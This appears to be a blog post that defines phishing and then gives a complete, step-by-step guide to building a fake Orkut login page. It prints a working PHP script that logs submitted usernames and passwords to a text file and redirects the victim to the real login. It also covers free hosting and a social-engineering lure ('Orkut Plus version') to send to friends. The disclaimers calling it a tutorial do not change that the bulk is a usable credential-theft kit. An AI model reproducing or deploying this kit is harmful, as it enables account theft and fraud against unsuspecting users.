Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies.
Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
This post only meant for tutorial purpose. It is 100% working please don't misuse. Here we take an example of getting login details of Orkut.
USE IT AT YOUR OWN RISK
First of all you need to find a webhost that supports PHP. I suggest Ripway to upload the required files.
Now, you need create three files:
- Fake Orkut Page.
- A PHP file that steals the user details.
- A Text file to store user details.
Making fake page:
- Go to http://www.orkut.com/. A login page will appear.
- Press Ctrl+S to save the page. Save page as Login.html.
- Now open the saved page using a text editor to edit its source.
- Search for action= there. You will find action=https://www.google.com/accounts/ServiceLoginAuth?service=orkut
- Replace above line as action=details.php
- Save the page by pressing Ctrl+S. Your Fake page is created.
Creating PHP Details Stealer File:
- Open notepad and type the following code
<?php header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=orkut '); $handle = fopen("logindata.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> |
- Now save the code as details.php
Details Storing Text File:
- Make a blank logindata.txt file.
Now, you are almost done. Now you have to upload these three file onto a free hosting site like Ripway.
When you upload these files on ripway your fake page link looks like http://h1.ripway.com/ripwayaccount/Login.html , post this link to your friends like Click Here to get Orkut Plus version, Orkut 2010 version etc. When victim will try to login to the account using your link and presses the Sign In button, his login details will store in logindata.txt and you can see on your webhost.
Warning:
Phising is an illegal activity. Please don't misuse or distribute your phisher page's link. Also delete those files from webhost.
